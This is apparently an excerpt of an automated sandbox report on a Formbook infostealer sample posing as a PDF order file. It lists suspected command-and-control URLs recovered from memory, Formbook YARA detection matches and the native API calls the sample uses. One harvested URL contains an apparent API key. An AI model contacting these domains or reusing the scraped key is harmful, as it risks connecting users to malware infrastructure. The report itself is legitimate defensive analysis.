          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ln2m1.shop
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ln2m1.shop/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ln2m1.shop/rn94/www.practicalfranchises.info
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ln2m1.shopReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.longmaosol.xyz
          Source: explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.longmaosol.xyz/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.longmaosol.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicoleb.tech
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicoleb.tech/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicoleb.tech/rn94/www.laske.xyz
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nicoleb.techReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.practicalfranchises.info
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.practicalfranchises.info/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.practicalfranchises.info/rn94/www.yzh478c.xyz
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.practicalfranchises.infoReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qwechaotk.top
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qwechaotk.top/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qwechaotk.top/rn94/www.ln2m1.shop
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qwechaotk.topReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resdai.xyz
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resdai.xyz/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resdai.xyz/rn94/www.qwechaotk.top
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.resdai.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.run-run.tokyo
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.run-run.tokyo/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.run-run.tokyo/rn94/www.010101-11122-2222.cloud
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.run-run.tokyoReferer:
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzh478c.xyz
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzh478c.xyz/rn94/
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzh478c.xyz/rn94/www.hinet.tech
          Source: explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yzh478c.xyzReferer:
          Source: explorer.exe, 00000006.00000000.2118388010.000000000C549000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4549228460.000000000C549000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000000.2109047338.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4543330536.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875781902.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.4545985269.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.4543330536.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2109047338.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.2105787269.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4541946347.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097772705.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000006.00000002.4546921012.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876221001.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095307334.0000000009BA1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000003.3095307334.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.0000000009BA1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4546983182.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875425211.0000000009C92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000002.4549228460.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2118388010.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000006.00000002.4545985269.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2113534114.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ORDER_1105-19-24-3537.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4540554051.0000000002B30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4551128208.000000000F01C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4541049594.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4540355301.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2165863634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2127105917.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ORDER_1105-19-24-3537.pdf.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 1576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sampleStatic PE information: Filename: ORDER_1105-19-24-3537.pdf.exe
          Source: initial sampleStatic PE information: Filename: ORDER_1105-19-24-3537.pdf.exe
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A350 NtCreateFile,4_2_0041A350
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A400 NtReadFile,4_2_0041A400
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A480 NtClose,4_2_0041A480
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A530 NtAllocateVirtualMemory,4_2_0041A530
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A34A NtCreateFile,4_2_0041A34A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_0041A52A NtAllocateVirtualMemory,4_2_0041A52A
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182B60 NtClose,LdrInitializeThunk,4_2_01182B60
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_01182BF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182AD0 NtReadFile,LdrInitializeThunk,4_2_01182AD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182D10 NtMapViewOfSection,LdrInitializeThunk,4_2_01182D10
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_01182D30
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182DD0 NtDelayExecution,LdrInitializeThunk,4_2_01182DD0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01182DF0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01182C70
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_01182CA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182F30 NtCreateSection,LdrInitializeThunk,4_2_01182F30
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182F90 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01182F90
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182FB0 NtResumeThread,LdrInitializeThunk,4_2_01182FB0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182FE0 NtCreateFile,LdrInitializeThunk,4_2_01182FE0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_01182E80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_01182EA0
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01184340 NtSetContextThread,4_2_01184340
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01184650 NtSuspendThread,4_2_01184650
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182B80 NtQueryInformationFile,4_2_01182B80
          Source: C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exeCode function: 4_2_01182BA0 NtEnumerateValueKey,4_2_01182BA0
